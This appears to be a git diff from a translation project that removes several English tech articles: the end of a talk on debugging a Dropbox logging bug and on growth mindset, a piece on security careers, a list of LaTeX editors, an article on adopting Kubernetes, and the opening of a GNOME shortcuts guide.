The first two bugs were not a big deal on their own. The first one was that the desktop client sent logs up to the server starting with the oldest one instead of starting with the newest. This isn’t really what you want – for example, the server would tell the client to send logs if the client reported an exception, so probably you care about the logs that just happened and not the oldest logs that happen to be on disk.
|
||||
|
||||
The second bug was similar to the first: if the log directory hit its maximum size, the client would delete the logs starting with the newest instead of starting with the oldest. Again, you lose log files either way, but you probably care less about the older ones.
|
||||
|
||||
The third bug had to do with the encryption. Sometimes, the server would be unable to decrypt a log file. (We generally didn’t figure out why – maybe it was a bitflip.) We weren’t handling this error correctly on the backend, so the server would reply with a 500\. The client would behave reasonably in the face of a 500: it would assume that the server was down. So it would stop sending log files and not try to send up any of the others.
|
||||
|
||||
Returning a 500 on a corrupted log file is clearly not the right behavior. You could consider returning a 400, since it’s a problem with the client request. But the client also can’t fix the problem – if the log file can’t be decrypted now, we’ll never be able to decrypt it in the future. What you really want the client to do is just delete the log and move on. In fact, that’s the default behavior when the client gets a 200 back from the server for a log file that was successfully stored. So we said, ok – if the log file can’t be decrypted, just return a 200.
|
||||
|
||||
All of these bugs were straightforward to fix. The first two bugs were on the client, so we’d fixed them on the alpha build but they hadn’t gone out to the majority of clients. The third bug we fixed on the server and deployed.
|
||||
|
||||
### 📈
|
||||
|
||||
Suddenly traffic to the log cluster spikes. The serving team reaches out to us to ask if we know what’s going on. It takes me a minute to put all the pieces together.
|
||||
|
||||
Before these fixes, there were four things going on:
|
||||
|
||||
1. Log files were sent up starting with the oldest
|
||||
|
||||
2. Log files were deleted starting with the newest
|
||||
|
||||
3. If the server couldn’t decrypt a log file it would 500
|
||||
|
||||
4. If the client got a 500 it would stop sending logs
|
||||
|
||||
A client with a corrupted log file would try to send it, the server would 500, the client would give up sending logs. On its next run, it would try to send the same file again, fail again, and give up again. Eventually the log directory would get full, at which point the client would start deleting its newest files, leaving the corrupted one on disk.
|
||||
|
||||
The upshot of these three bugs: if a client ever had a corrupted log file, we would never see logs from that client again.
|
||||
|
||||
The problem is that there were a lot more clients in this state than we thought. Any client with a single corrupted file had been dammed up from sending logs to the server. Now that dam was cleared, and all of them were sending up the rest of the contents of their log directories.
|
||||
|
||||
### Our options
|
||||
|
||||
Ok, there’s a huge flood of traffic coming from machines around the world. What can we do? (This is a fun thing about working at a company with Dropbox’s scale, and particularly Dropbox’s scale of desktop clients: you can trigger a self-DDOS very easily.)
|
||||
|
||||
The first option when you do a deploy and things start going sideways is to rollback. Totally reasonable choice, but in this case, it wouldn’t have helped us. The state that we’d transformed wasn’t the state on the server but the state on the client – we’d deleted those files. Rolling back the server would prevent additional clients from entering this state but it wouldn’t solve the problem.
|
||||
|
||||
What about increasing the size of the logging cluster? We did that – and started getting even more requests, now that we’d increased our capacity. We increased it again, but you can’t do that forever. Why not? This cluster isn’t isolated. It’s making requests into another cluster, in this case to handle exceptions. If you have a DDOS pointed at one cluster, and you keep scaling that cluster, you’re going to knock over its depedencies too, and now you have two problems.
|
||||
|
||||
Another option we considered was shedding load – you don’t need every single log file, so can we just drop requests. One of the challenges here was that we didn’t have an easy way to tell good traffic from bad. We couldn’t quickly differentiate which log files were old and which were new.
|
||||
|
||||
The solution we hit on is one that’s been used at Dropbox on a number of different occassions: we have a custom header, `chillout`, which every client in the world respects. If the client gets a response with this header, then it doesn’t make any requests for the provided number of seconds. Someone very wise added this to the Dropbox client very early on, and it’s come in handy more than once over the years. The logging server didn’t have the ability to set that header, but that’s an easy problem to solve. So two of my colleagues, Isaac Goldberg and John Lai, implemented support for it. We set the logging cluster chillout to two minutes initially and then managed it down as the deluge subsided over the next couple of days.
|
||||
|
||||
### Know your system
|
||||
|
||||
The first lesson from this bug is to know your system. I had a good mental model of the interaction between the client and the server, but I wasn’t thinking about what would happen when the server was interacting with all the clients at once. There was a level of complexity that I hadn’t thought all the way through.
|
||||
|
||||
### Know your tools
|
||||
|
||||
The second lesson is to know your tools. If things go sideways, what options do you have? Can you reverse your migration? How will you know if things are going sideways and how can you discover more? All of those things are great to know before a crisis – but if you don’t, you’ll learn them during a crisis and then never forget.
|
||||
|
||||
### Feature flags & server-side gating
|
||||
|
||||
The third lesson is for you if you’re writing a mobile or a desktop application: _You need server-side feature gating and server-side flags._ When you discover a problem and you don’t have server-side controls, the resolution might take days or weeks as you push out a new release or submit a new version to the app store. That’s a bad situation to be in. The Dropbox desktop client isn’t going through an app store review process, but just pushing out a build to tens of millions of clients takes time. Compare that to hitting a problem in your feature and flipping a switch on the server: ten minutes later your problem is resolved.
|
||||
|
||||
This strategy is not without its costs. Having a bunch of feature flags in your code adds to the complexity dramatically. You get a combinatoric problem with your testing: what if feature A is enabled and feature B, or just one, or neither – multiplied across N features. It’s extremely difficult to get engineers to clean up their feature flags after the fact (and I was also guilty of this). Then for the desktop client there’s multiple versions in the wild at the same time, so it gets pretty hard to reason about.
|
||||
|
||||
But the benefit – man, when you need it, you really need it.
|
||||
|
||||
# How to love bugs
|
||||
|
||||
I’ve talked about some bugs that I love and I’ve talked about why to love bugs. Now I want to tell you how to love bugs. If you don’t love bugs yet, I know of exactly one way to learn, and that’s to have a growth mindset.
|
||||
|
||||
The sociologist Carol Dweck has done a ton of interesting research about how people think about intelligence. She’s found that there are two different frameworks for thinking about intelligence. The first, which she calls the fixed mindset, holds that intelligence is a fixed trait, and people can’t change how much of it they have. The other mindset is a growth mindset. Under a growth mindset, people believe that intelligence is malleable and can increase with effort.
|
||||
|
||||
Dweck found that a person’s theory of intelligence – whether they hold a fixed or growth mindset – can significantly influence the way they select tasks to work on, the way they respond to challenges, their cognitive performance, and even their honesty.
|
||||
|
||||
[I also talked about a growth mindset in my Kiwi PyCon keynote, so here are just a few excerpts. You can read the full transcript [here][7].]
|
||||
|
||||
Findings about honesty:
|
||||
|
||||
> After this, they had the students write letters to pen pals about the study, saying “We did this study at school, and here’s the score that I got.” They found that _almost half of the students praised for intelligence lied about their scores_ , and almost no one who was praised for working hard was dishonest.
|
||||
|
||||
On effort:
|
||||
|
||||
> Several studies found that people with a fixed mindset can be reluctant to really exert effort, because they believe it means they’re not good at the thing they’re working hard on. Dweck notes, “It would be hard to maintain confidence in your ability if every time a task requires effort, your intelligence is called into question.”
|
||||
|
||||
On responding to confusion:
|
||||
|
||||
> They found that students with a growth mindset mastered the material about 70% of the time, regardless of whether there was a confusing passage in it. Among students with a fixed mindset, if they read the booklet without the confusing passage, again about 70% of them mastered the material. But the fixed-mindset students who encountered the confusing passage saw their mastery drop to 30%. Students with a fixed mindset were pretty bad at recovering from being confused.
|
||||
|
||||
These findings show that a growth mindset is critical while debugging. We have to recover from confusion, be candid about the limitations of our understanding, and at times really struggle on the way to finding solutions – all of which is easier and less painful with a growth mindset.
|
||||
|
||||
### Love your bugs
|
||||
|
||||
I learned to love bugs by explicitly celebrating challenges while working at the Recurse Center. A participant would sit down next to me and say, “[sigh] I think I’ve got a weird Python bug,” and I’d say, “Awesome, I _love_ weird Python bugs!” First of all, this is definitely true, but more importantly, it emphasized to the participant that finding something where they struggled an accomplishment, and it was a good thing for them to have done that day.
|
||||
|
||||
As I mentioned, at the Recurse Center there are no deadlines and no assignments, so this attitude is pretty much free. I’d say, “You get to spend a day chasing down this weird bug in Flask, how exciting!” At Dropbox and later at Pilot, where we have a product to ship, deadlines, and users, I’m not always uniformly delighted about spending a day on a weird bug. So I’m sympathetic to the reality of the world where there are deadlines. However, if I have a bug to fix, I have to fix it, and being grumbly about the existence of the bug isn’t going to help me fix it faster. I think that even in a world where deadlines loom, you can still apply this attitude.
|
||||
|
||||
If you love your bugs, you can have more fun while you’re working on a tough problem. You can be less worried and more focused, and end up learning more from them. Finally, you can share a bug with your friends and colleagues, which helps you and your teammates.
|
||||
|
||||
### Obrigada!
|
||||
|
||||
My thanks to folks who gave me feedback on this talk and otherwise contributed to my being there:
|
||||
|
||||
* Sasha Laundy
|
||||
|
||||
* Amy Hanlon
|
||||
|
||||
* Julia Evans
|
||||
|
||||
* Julian Cooper
|
||||
|
||||
* Raphael Passini Diniz and the rest of the Python Brasil organizing team
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: http://akaptur.com/blog/2017/11/12/love-your-bugs/
|
||||
|
||||
作者:[Allison Kaptur ][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:http://akaptur.com/about/
|
||||
[1]:http://2017.pythonbrasil.org.br/#
|
||||
[2]:http://www.youtube.com/watch?v=h4pZZOmv4Qs
|
||||
[3]:http://www.pilot.com/
|
||||
[4]:http://www.dropbox.com/
|
||||
[5]:http://www.recurse.com/
|
||||
[6]:http://www.youtube.com/watch?v=ETgNLF_XpEM
|
||||
[7]:http://akaptur.com/blog/2015/10/10/effective-learning-strategies-for-programmers/
|
@ -1,60 +0,0 @@
|
||||
translating---geekpi
|
||||
|
||||
Security Jobs Are Hot: Get Trained and Get Noticed
|
||||
============================================================
|
||||
|
||||
![security skills](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/security-skills.png?itok=IrwppCUw "security skills")
|
||||
The Open Source Jobs Report, from Dice and The Linux Foundation, found that professionals with security experience are in high demand for the future.[Used with permission][1]
|
||||
|
||||
The demand for security professionals is real. On [Dice.com][4], 15 percent of the more than 75K jobs are security positions. “Every year in the U.S., 40,000 jobs for information security analysts go unfilled, and employers are struggling to fill 200,000 other cyber-security related roles, according to cyber security data tool [CyberSeek][5]” ([Forbes][6]). We know that there is a fast-increasing need for security specialists, but that the interest level is low.
|
||||
|
||||
### Security is the place to be
|
||||
|
||||
In my experience, few students coming out of college are interested in roles in security; so many people see security as niche. Entry-level tech pros are interested in business analyst or system analyst roles, because of a belief that if you want to learn and apply core IT concepts, you have to stick to analyst roles or those closer to product development. That’s simply not the case.
|
||||
|
||||
In fact, if you’re interested in getting in front of your business leaders, security is the place to be – as a security professional, you have to understand the business end-to-end; you have to look at the big picture to give your company the advantage.
|
||||
|
||||
### Be fearless
|
||||
|
||||
Analyst and security roles are not all that different. Companies continue to merge engineering and security roles out of necessity. Businesses are moving faster than ever with infrastructure and code being deployed through automation, which increases the importance of security being a part of all tech pros day to day lives. In our [Open Source Jobs Report with The Linux Foundation][7], 42 percent of hiring managers said professionals with security experience are in high demand for the future.
|
||||
|
||||
There has never been a more exciting time to be in security. If you stay up-to-date with tech news, you’ll see that a huge number of stories are related to security – data breaches, system failures and fraud. The security teams are working in ever-changing, fast-paced environments. A real challenge lies is in the proactive side of security, finding, and eliminating vulnerabilities while maintaining or even improving the end-user experience.
|
||||
|
||||
### Growth is imminent
|
||||
|
||||
Of any aspect of tech, security is the one that will continue to grow with the cloud. Businesses are moving more and more to the cloud and that’s exposing more security vulnerabilities than organizations are used to. As the cloud matures, security becomes increasingly important.
|
||||
|
||||
Regulations are also growing – Personally Identifiable Information (PII) is getting broader all the time. Many companies are finding that they must invest in security to stay in compliance and avoid being in the headlines. Companies are beginning to budget more and more for security tooling and staffing due to the risk of heavy fines, reputational damage, and, to be honest, executive job security.
|
||||
|
||||
### Training and support
|
||||
|
||||
Even if you don’t choose a security-specific role, you’re bound to find yourself needing to code securely, and if you don’t have the skills to do that, you’ll start fighting an uphill battle. There are certainly ways to learn on-the-job if your company offers that option, that’s encouraged but I recommend a combination of training, mentorship and constant practice. Without using your security skills, you’ll lose them fast with how quickly the complexity of malicious attacks evolve.
|
||||
|
||||
My recommendation for those seeking security roles is to find the people in your organization that are the strongest in engineering, development, or architecture areas – interface with them and other teams, do hands-on work, and be sure to keep the big-picture in mind. Be an asset to your organization that stands out – someone that can securely code and also consider strategy and overall infrastructure health.
|
||||
|
||||
### The end game
|
||||
|
||||
More and more companies are investing in security and trying to fill open roles in their tech teams. If you’re interested in management, security is the place to be. Executive leadership wants to know that their company is playing by the rules, that their data is secure, and that they’re safe from breaches and loss.
|
||||
|
||||
Security that is implemented wisely and with strategy in mind will get noticed. Security is paramount for executives and consumers alike – I’d encourage anyone interested in security to train up and contribute.
|
||||
|
||||
_[Download ][2]the full 2017 Open Source Jobs Report now._
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.linux.com/blog/os-jobs-report/2017/11/security-jobs-are-hot-get-trained-and-get-noticed
|
||||
|
||||
作者:[ BEN COLLEN][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.linux.com/users/bencollen
|
||||
[1]:https://www.linux.com/licenses/category/used-permission
|
||||
[2]:http://bit.ly/2017OSSjobsreport
|
||||
[3]:https://www.linux.com/files/images/security-skillspng
|
||||
[4]:http://www.dice.com/
|
||||
[5]:http://cyberseek.org/index.html#about
|
||||
[6]:https://www.forbes.com/sites/jeffkauflin/2017/03/16/the-fast-growing-job-with-a-huge-skills-gap-cyber-security/#292f0a675163
|
||||
[7]:http://media.dice.com/report/the-2017-open-source-jobs-report-employers-prioritize-hiring-open-source-professionals-with-latest-skills/
|
@ -1,264 +0,0 @@
|
||||
10 Best LaTeX Editors For Linux
|
||||
======
|
||||
**Brief: Once you get over the learning curve, there is nothing like LaTex.
|
||||
Here are the best LaTex editors for Linux and other systems.**
|
||||
|
||||
## What is LaTeX?
|
||||
|
||||
[LaTeX][1] is a document preparation system. Unlike plain text editor, you
|
||||
can't just write a plain text using LaTeX editors. Here, you will have to
|
||||
utilize LaTeX commands in order to manage the content of the document.
|
||||
|
||||
![LaTex Sample][2]![LaTex Sample][3]
|
||||
|
||||
LaTex Editors are generally used to publish scientific research documents or
|
||||
books for academic purposes. Most importantly, LaText editors come handy while
|
||||
dealing with a document containing complex Mathematical notations. Surely,
|
||||
LaTeX editors are fun to use. But, not that useful unless you have specific
|
||||
needs for a document.
|
||||
|
||||
## Why should you use LaTex?
|
||||
|
||||
Well, just like I previously mentioned, LaTeX editors are meant for specific
|
||||
purposes. You do not need to be a geek head in order to figure out the way to
|
||||
use LaTeX editors but it is not a productive solution for users who deal with
|
||||
basic text editors.
|
||||
|
||||
If you are looking to craft a document but you are not interested in spending
|
||||
time formatting the text, then LaTeX editors should be the one you should go
|
||||
for. With LaTeX editors, you just have to specify the type of document, and
|
||||
the text font and sizes will be taken care of accordingly. No wonder it is
|
||||
considered one of the [best open source tools for writers][4].
|
||||
|
||||
Do note that it isn't something automated, you will have to first learn LaTeX
|
||||
commands to let the editor handle the text formatting with precision.
|
||||
|
||||
## 10 Of The Best LaTeX Editors For Linux
|
||||
|
||||
Just for information, the list is not in any specific order. Editor at number
|
||||
three is not better than the editor at number seven.
|
||||
|
||||
### 1\. Lyx
|
||||
|
||||
![][2]
|
||||
|
||||
![][5]
|
||||
|
||||
Lyx is an open source LaTeX Editor. In other words, it is one of the best
|
||||
document processors available on the web.LyX helps you focus on the structure
|
||||
of the write-up, just as every LaTeX editor should and lets you forget about
|
||||
the word formatting. LyX would manage whatsoever depending on the type of
|
||||
document specified. You get to control a lot of stuff while you have it
|
||||
installed. The margins, headers/footers, spacing/indents, tables, and so on.
|
||||
|
||||
If you are into crafting scientific documents, research thesis, or similar,
|
||||
you will be delighted to experience Lyx's formula editor which should be a
|
||||
charm to use. LyX also includes a set of tutorials to get started without much
|
||||
of a hassle.
|
||||
|
||||
[Lyx][6]
|
||||
|
||||
### 2\. Texmaker
|
||||
|
||||
![][2]
|
||||
|
||||
![][7]
|
||||
|
||||
Texmaker is considered to be one of the best LaTeX editors for GNOME desktop
|
||||
environment. It presents a great user interface which results in a good user
|
||||
experience. It is also crowned to be one among the most useful LaTeX editor
|
||||
there is.If you perform PDF conversions often, you will find TeXmaker to be
|
||||
relatively faster than other LaTeX editors. You can take a look at a preview
|
||||
of what the final document would look like while you write. Also, one could
|
||||
observe the symbols being easy to reach when needed.
|
||||
|
||||
Texmaker also offers an extensive support for hotkeys configuration. Why not
|
||||
give it a try?
|
||||
|
||||
[Texmaker][8]
|
||||
|
||||
### 3\. TeXstudio
|
||||
|
||||
![][2]
|
||||
|
||||
![][9]
|
||||
|
||||
If you want a LaTeX editor which offers you a decent level of customizability
|
||||
along with an easy-to-use interface, then TeXstudio would be the perfect one
|
||||
to have installed. The UI is surely very simple but not clumsy. TeXstudio lets
|
||||
you highlight syntax, comes with an integrated viewer, lets you check the
|
||||
references and also bundles some other assistant tools.
|
||||
|
||||
It also supports some cool features like auto-completion, link overlay,
|
||||
bookmarks, multi-cursors, and so on - which makes writing a LaTeX document
|
||||
easier than ever before.
|
||||
|
||||
TeXstudio is actively maintained, which makes it a compelling choice for both
|
||||
novice users and advanced writers.
|
||||
|
||||
[TeXstudio][10]
|
||||
|
||||
### 4\. Gummi
|
||||
|
||||
![][2]
|
||||
|
||||
![][11]
|
||||
|
||||
Gummi is a very simple LaTeX editor based on the GTK+ toolkit. Well, you may
|
||||
not find a lot of fancy options here but if you are just starting out - Gummi
|
||||
will be our recommendation.It supports exporting the documents to PDF format,
|
||||
lets you highlight syntax, and helps you with some basic error checking
|
||||
functionalities. Though Gummi isn't actively maintained via GitHub it works
|
||||
just fine.
|
||||
|
||||
[Gummi][12]
|
||||
|
||||
### 5\. TeXpen
|
||||
|
||||
![][2]
|
||||
|
||||
![][13]
|
||||
|
||||
TeXpen is yet another simplified tool to go with. You get the auto-completion
|
||||
functionality with this LaTeX editor. However, you may not find the user
|
||||
interface impressive. If you do not mind the UI, but want a super easy LaTeX
|
||||
editor, TeXpen could fulfill that wish for you.Also, TeXpen lets you
|
||||
correct/improve the English grammar and expressions used in the document.
|
||||
|
||||
[TeXpen][14]
|
||||
|
||||
### 6\. ShareLaTeX
|
||||
|
||||
![][2]
|
||||
|
||||
![][15]
|
||||
|
||||
ShareLaTeX is an online LaTeX editor. If you want someone (or a group of
|
||||
people) to collaborate on documents you are working on, this is what you need.
|
||||
|
||||
It offers a free plan along with several paid packages. Even the students of
|
||||
Harvard University & Oxford University utilize this for their projects. With
|
||||
the free plan, you get the ability to add one collaborator.
|
||||
|
||||
The paid packages let you sync the documents on GitHub and Dropbox along with
|
||||
the ability to record the full document history. You can choose to have
|
||||
multiple collaborators as per your plan. For students, there's a separate
|
||||
pricing plan available.
|
||||
|
||||
[ShareLaTeX][16]
|
||||
|
||||
### 7\. Overleaf
|
||||
|
||||
![][2]
|
||||
|
||||
![][17]
|
||||
|
||||
Overleaf is yet another online LaTeX editor. Similar to ShareLaTeX, it offers
|
||||
separate pricing plans for professionals and students. It also includes a free
|
||||
plan where you can sync with GitHub, check your revision history, and add
|
||||
multiple collaborators.
|
||||
|
||||
There's a limit on the number of files you can create per project - so it
|
||||
could bother if you are a professional working with LaTeX documents most of
|
||||
the time.
|
||||
|
||||
[Overleaf][18]
|
||||
|
||||
### 8\. Authorea
|
||||
|
||||
![][2]
|
||||
|
||||
![][19]
|
||||
|
||||
Authorea is a wonderful online LaTeX editor. However, it is not the best out
|
||||
there - when considering the pricing plans. For free, it offers just 100 MB of
|
||||
data upload limit and 1 private document at a time. The paid plans offer you
|
||||
more perks but it may not be the cheapest from the lot.The only reason you
|
||||
should choose Authorea is the user interface. If you love to work with a tool
|
||||
offering an impressive user interface, there's no looking back.
|
||||
|
||||
[Authorea][20]
|
||||
|
||||
### 9\. Papeeria
|
||||
|
||||
![][2]
|
||||
|
||||
![][21]
|
||||
|
||||
Papeeria is the cheapest LaTeX editor you can find on the Internet -
|
||||
considering it is as reliable as the others. You do not get private projects
|
||||
if you want to utilize it for free. But, if you prefer public projects it lets
|
||||
you work on an unlimited number of projects with numerous collaborators. It
|
||||
features a pretty simple plot builder and includes Git sync for no additional
|
||||
cost.If you opt for the paid plan, it will empower you with the ability to
|
||||
work on 10 private projects.
|
||||
|
||||
[Papeeria][22]
|
||||
|
||||
### 10\. Kile
|
||||
|
||||
![Kile LaTeX editor][2]
|
||||
|
||||
![Kile LaTeX editor][23]
|
||||
|
||||
Last entry in our list of best LaTeX editor is Kile. Some people swear by
|
||||
Kile. Primarily because of the features it provides.
|
||||
|
||||
Kile is more than just an editor. It is an IDE tool like Eclipse that provides
|
||||
a complete environment to work on documents and projects. Apart from quick
|
||||
compilation and preview, you get features like auto-completion of commands,
|
||||
insert citations, organize document in chapters etc. You really have to use
|
||||
Kile to realize its true potential.
|
||||
|
||||
Kile is available for Linux and Windows.
|
||||
|
||||
[Kile][24]
|
||||
|
||||
### Wrapping Up
|
||||
|
||||
So, there go our recommendations for the LaTeX editors you should utilize on
|
||||
Ubuntu/Linux.
|
||||
|
||||
There are chances that we might have missed some interesting LaTeX editors
|
||||
available for Linux. If you happen to know about any, let us know down in the
|
||||
comments below.
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://itsfoss.com/latex-editors-linux/
|
||||
|
||||
作者:[Ankush Das][a]
|
||||
译者:[翻译者ID](https://github.com/翻译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://itsfoss.com/author/ankush/
|
||||
[1]:https://www.latex-project.org/
|
||||
[2]:data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs=
|
||||
[3]:https://itsfoss.com/wp-content/uploads/2017/11/latex-sample-example.jpeg
|
||||
[4]:https://itsfoss.com/open-source-tools-writers/
|
||||
[5]:https://itsfoss.com/wp-content/uploads/2017/10/lyx_latex_editor.jpg
|
||||
[6]:https://www.lyx.org/
|
||||
[7]:https://itsfoss.com/wp-content/uploads/2017/10/texmaker_latex_editor.jpg
|
||||
[8]:http://www.xm1math.net/texmaker/
|
||||
[9]:https://itsfoss.com/wp-content/uploads/2017/10/tex_studio_latex_editor.jpg
|
||||
[10]:https://www.texstudio.org/
|
||||
[11]:https://itsfoss.com/wp-content/uploads/2017/10/gummi_latex_editor.jpg
|
||||
[12]:https://github.com/alexandervdm/gummi
|
||||
[13]:https://itsfoss.com/wp-content/uploads/2017/10/texpen_latex_editor.jpg
|
||||
[14]:https://sourceforge.net/projects/texpen/
|
||||
[15]:https://itsfoss.com/wp-content/uploads/2017/10/sharelatex.jpg
|
||||
[16]:https://www.sharelatex.com/
|
||||
[17]:https://itsfoss.com/wp-content/uploads/2017/10/overleaf.jpg
|
||||
[18]:https://www.overleaf.com/
|
||||
[19]:https://itsfoss.com/wp-content/uploads/2017/10/authorea.jpg
|
||||
[20]:https://www.authorea.com/
|
||||
[21]:https://itsfoss.com/wp-content/uploads/2017/10/papeeria_latex_editor.jpg
|
||||
[22]:https://www.papeeria.com/
|
||||
[23]:https://itsfoss.com/wp-content/uploads/2017/11/kile-latex-800x621.png
|
||||
[24]:https://kile.sourceforge.io/
|
@ -1,95 +0,0 @@
|
||||
translating by aiwhj
|
||||
|
||||
Adopting Kubernetes step by step
|
||||
============================================================
|
||||
|
||||
Why Docker and Kubernetes?
|
||||
|
||||
Containers allow us to build, ship and run distributed applications. They remove the machine constraints from applications and lets us create a complex application in a deterministic fashion.
|
||||
|
||||
Composing applications with containers allows us to make development, QA and production environments closer to each other (if you put the effort in to get there). By doing so, changes can be shipped faster and testing a full system can happen sooner.
|
||||
|
||||
[Docker][1] — the containerization platform — provides this, making software _independent_ of cloud providers.
|
||||
|
||||
However, even with containers the amount of work needed for shipping your application through any cloud provider (or in a private cloud) is significant. An application usually needs auto scaling groups, persistent remote discs, auto discovery, etc. But each cloud provider has different mechanisms for doing this. If you want to support these features, you very quickly become cloud provider dependent.
|
||||
|
||||
This is where [Kubernetes][2] comes in to play. It is an orchestration system for containers that allows you to manage, scale and deploy different pieces of your application — in a standardised way — with great tooling as part of it. It’s a portable abstraction that’s compatible with the main cloud providers (Google Cloud, Amazon Web Services and Microsoft Azure all have support for Kubernetes).
|
||||
|
||||
A way to visualise your application, containers and Kubernetes is to think about your application as a shark — stay with me — that exists in the ocean (in this example, the ocean is your machine). The ocean may have other precious things you don’t want your shark to interact with, like [clown fish][3]. So you move you shark (your application) into a sealed aquarium (Container). This is great but not very robust. Your aquarium can break or maybe you want to build a tunnel to another aquarium where other fish live. Or maybe you want many copies of that aquarium in case one needs cleaning or maintenance… this is where Kubernetes clusters come to play.
|
||||
|
||||
|
||||
![](https://cdn-images-1.medium.com/max/1600/1*OVt8cnY1WWOqdLFycCgdFg.jpeg)
|
||||
Evolution to Kubernetes
|
||||
|
||||
With Kubernetes being supported by the main cloud providers, it makes it easier for you and your team to have environments from _development _ to _production _ that are almost identical to each other. This is because Kubernetes has no reliance on proprietary software, services or infrastructure.
|
||||
|
||||
The fact that you can start your application in your machine with the same pieces as in production closes the gaps between a development and a production environment. This makes developers more aware of how an application is structured together even though they might only be responsible for one piece of it. It also makes it easier for your application to be fully tested earlier in the pipeline.
|
||||
|
||||
How do you work with Kubernetes?
|
||||
|
||||
With more people adopting Kubernetes new questions arise; how should I develop against a cluster based environment? Suppose you have 3 environments — development, QA and production — how do I fit Kubernetes in them? Differences across these environments will still exist, either in terms of development cycle (e.g. time spent to see my code changes in the application I’m running) or in terms of data (e.g. I probably shouldn’t test with production data in my QA environment as it has sensitive information).
|
||||
|
||||
So, should I always try to work inside a Kubernetes cluster, building images, recreating deployments and services while I code? Or maybe I should not try too hard to make my development environment be a Kubernetes cluster (or set of clusters) in development? Or maybe I should work in a hybrid way?
|
||||
|
||||
|
||||
![](https://cdn-images-1.medium.com/max/1600/1*MXokxD8Ktte4_vWvTas9uw.jpeg)
|
||||
Development with a local cluster
|
||||
|
||||
If we carry on with our metaphor, the holes on the side represent a way to make changes to our app while keeping it in a development cluster. This is usually achieved via [volumes][4].
|
||||
|
||||
A Kubernetes series
|
||||
|
||||
The Kubernetes series repository is open source and available here:
|
||||
|
||||
### [https://github.com/red-gate/ks][5]
|
||||
|
||||
We’ve written this series as we experiment with different ways to build software. We’ve tried to constrain ourselves to use Kubernetes in all environments so that we can explore the impact these technologies will have on the development and management of data and the database.
|
||||
|
||||
The series starts with the basic creation of a React application hooked up to Kubernetes, and evolves to encompass more of our development requirements. By the end we’ll have covered all of our application development needs _and_ have understood how best to cater for the database lifecycle in this world of containers and clusters.
|
||||
|
||||
Here are the first 5 episodes of this series:
|
||||
|
||||
1. ks1: build a React app with Kubernetes
|
||||
|
||||
2. ks2: make minikube detect React code changes
|
||||
|
||||
3. ks3: add a python web server that hosts an API
|
||||
|
||||
4. ks4: make minikube detect Python code changes
|
||||
|
||||
5. ks5: create a test environment
|
||||
|
||||
The second part of the series will add a database and try to work out the best way to evolve our application alongside it.
|
||||
|
||||
By running Kubernetes in all environments, we’ve been forced to solve new problems as we try to keep the development cycle as fast as possible. The trade-off being that we are constantly exposed to Kubernetes and become more accustomed to it. By doing so, development teams become responsible for production environments, which is no longer difficult as all environments (development through production) are all managed in the same way.
|
||||
|
||||
What’s next?
|
||||
|
||||
We will continue this series by incorporating a database and experimenting to find the best way to have a seamless database lifecycle experience with Kubernetes.
|
||||
|
||||
_This Kubernetes series is brought to you by Foundry, Redgate’s R&D division. We’re working on making it easier to manage data alongside containerised environments, so if you’re working with data and containerised environments, we’d like to hear from you — reach out directly to the development team at _ [_foundry@red-gate.com_][6]
|
||||
|
||||
* * *
|
||||
|
||||
_We’re hiring_ _. Are you interested in uncovering product opportunities, building _ [_future technology_][7] _ and taking a startup-like approach (without the risk)? Take a look at our _ [_Software Engineer — Future Technologies_][8] _ role and read more about what it’s like to work at Redgate in _ [_Cambridge, UK_][9] _._
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://medium.com/ingeniouslysimple/adopting-kubernetes-step-by-step-f93093c13dfe
|
||||
|
||||
作者:[santiago arias][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://medium.com/@santiaago?source=post_header_lockup
|
||||
[1]:https://www.docker.com/what-docker
|
||||
[2]:https://kubernetes.io/
|
||||
[3]:https://www.google.co.uk/search?biw=723&bih=753&tbm=isch&sa=1&ei=p-YCWpbtN8atkwWc8ZyQAQ&q=nemo+fish&oq=nemo+fish&gs_l=psy-ab.3..0i67k1l2j0l2j0i67k1j0l5.5128.9271.0.9566.9.9.0.0.0.0.81.532.9.9.0....0...1.1.64.psy-ab..0.9.526...0i7i30k1j0i7i10i30k1j0i13k1j0i10k1.0.FbAf9xXxTEM
|
||||
[4]:https://kubernetes.io/docs/concepts/storage/volumes/
|
||||
[5]:https://github.com/red-gate/ks
|
||||
[6]:mailto:foundry@red-gate.com
|
||||
[7]:https://www.red-gate.com/foundry/
|
||||
[8]:https://www.red-gate.com/our-company/careers/current-opportunities/software-engineer-future-technologies
|
||||
[9]:https://www.red-gate.com/our-company/careers/living-in-cambridge
|
@ -1,77 +0,0 @@
|
||||
Useful GNOME Shell Keyboard Shortcuts You Might Not Know About
|
||||
======
|
||||
As Ubuntu has moved to Gnome Shell in its 17.10 release, many users may be interested to discover some of the most useful shortcuts in Gnome as well as how to create your own shortcuts. This article will explain both.
|
||||
|
||||
If you expect GNOME to ship with hundreds or thousands of shell shortcuts, you will be disappointed to learn this isn't the case. The list of shortcuts isn't miles long, and not all of them will be useful to you, but there are still many keyboard shortcuts you can take advantage of.
|
||||
|
||||
![gnome-shortcuts-01-settings][1]
|
||||
|
||||
![gnome-shortcuts-01-settings][1]
|
